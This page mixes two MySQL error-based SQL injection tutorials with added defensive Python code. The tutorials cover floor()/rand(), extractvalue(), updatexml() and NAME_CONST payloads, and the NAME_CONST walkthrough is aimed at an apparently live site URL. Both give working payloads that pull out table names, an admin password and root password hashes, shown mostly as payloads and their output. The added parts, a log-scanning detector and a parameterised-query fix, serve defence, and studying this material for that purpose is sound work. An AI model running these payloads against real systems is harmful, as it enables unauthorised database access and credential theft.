1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message; to read other data, replace the expression in the position of version().

For example, to retrieve the administrator's username and password:

Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
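All four techniques above (floor()/rand() with GROUP BY, extractvalue(), updatexml() and name_const()) arrive in the request URL and are easy to spot in web-server logs once the query string is decoded. The following is an added example, not code from the original post: a small scanner over access-log lines in Common Log Format. The log lines, source addresses and timestamps are constructed for the example (the request paths copy the payload shapes shown on this page), and the signature names and the function names are my own choice.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Common Log Format. The request paths copy the
# payload shapes on the page; the IPs and timestamps are made up for this example.
LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 290',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 301',
    '198.51.100.4 - - [10/Oct/2023:13:56:05 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 288',
]

# One signature per error-based family described on the page. They are matched
# against the decoded, lower-cased query string, so '+', %20 and case tricks do
# not matter. The floor/rand signature needs both halves anywhere in the string
# because the page shows GROUP BY both before and after the floor() call.
SIGNATURES = [
    ("floor_rand_groupby", re.compile(r"(?=.*floor\s*\(\s*rand\s*\()(?=.*group\s+by)", re.S)),
    ("extractvalue", re.compile(r"\bextractvalue\s*\(")),
    ("updatexml", re.compile(r"\bupdatexml\s*\(")),
    ("name_const", re.compile(r"\bname_const\s*\(")),
]

# Common Log Format: host ident authuser [time] "method path protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def decode_query(path):
    """Return the query string of a request path, decoded and lower-cased.
    Decoding twice catches payloads that were percent-encoded on top of the
    '+' spacing used in the page's URLs."""
    if "?" not in path:
        return ""
    query = path.split("?", 1)[1]
    return unquote_plus(unquote_plus(query)).lower()


def classify(path):
    """Names of the error-based injection families present in one request path."""
    query = decode_query(path)
    return [name for name, rx in SIGNATURES if rx.search(query)]


def scan(lines):
    """Parse log lines and return (ip, status, path, families) for each flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        families = classify(m.group("path"))
        if families:
            hits.append((m.group("ip"), int(m.group("status")), m.group("path"), families))
    return hits


def count_by_ip(hits):
    """Flagged requests per source address, the figure an alert threshold keys on."""
    counts = {}
    for ip, _status, _path, _families in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(LOG_LINES)
    for ip, status, path, families in found:
        print(f"{ip} {status} {','.join(families)} {path[:60]}")
    print(count_by_ip(found))
```

The status column is worth keeping next to the match: error-based injection only works when the database error reaches the client, so a flagged request that also returned a 500 (or a 200 containing an "ERROR 1062" / "XPATH syntax error" string in the body, if response logging is available) is the one to escalate first.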
Error-based injection on newer MySQL versions: injecting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|------|
| TEST |
|------|
| 1    |
|------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
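Every technique on this page depends on two application defects at once: the id parameter is pasted into the SQL text, and the database's error message is echoed back to the browser. The following is an added example, not code from either post: the vulnerable handler shape and its fixed counterpart side by side, run against an in-memory SQLite copy of the article table from the first section. SQLite stands in for MySQL here (it has no version(), name_const() or extractvalue(), so the probe fails at parse time instead of leaking a value), the table rows and PAYLOAD are constructed, and the function names are my own.

```python
import sqlite3

# Constructed payload in the shape of the page's floor()/version() probe. SQLite
# has no version() function, so the concatenated statement fails to prepare and
# the error text is what a leaky handler would hand straight back to the client.
PAYLOAD = "1 and 1=(select 1 from (select count(*), version() as x from sqlite_master group by x))"


def make_db():
    """In-memory stand-in for the page's article table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article(id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    return conn


def fetch_article_vulnerable(conn, user_id):
    """Builds the statement by string concatenation, the pattern behind
    detail.php?id=..., and echoes the database error text. That echo is the
    channel every error-based technique on this page reads data through."""
    try:
        return conn.execute("select * from article where id = " + user_id).fetchall()
    except sqlite3.Error as exc:
        return "DB error: " + str(exc)


def fetch_article_safe(conn, user_id):
    """Binds the input as a parameter and never returns error text. The value
    is compared as data, so SQL inside it is inert, and a failing query gives
    the client the same empty answer as a missing row."""
    try:
        return conn.execute("select * from article where id = ?", (user_id,)).fetchall()
    except sqlite3.Error:
        # log the exception server-side; the client only ever sees "no such article"
        return []


if __name__ == "__main__":
    db = make_db()
    print(fetch_article_vulnerable(db, "1"))        # normal row
    print(fetch_article_vulnerable(db, PAYLOAD))    # error text leaks to the caller
    print(fetch_article_safe(db, PAYLOAD))          # [] : payload treated as a value
```

Both controls matter: parameterisation stops the injected SQL from being parsed at all, and returning a generic error removes the side channel the Duplicate entry / XPATH syntax error messages provide even where some other query on the site is still concatenated.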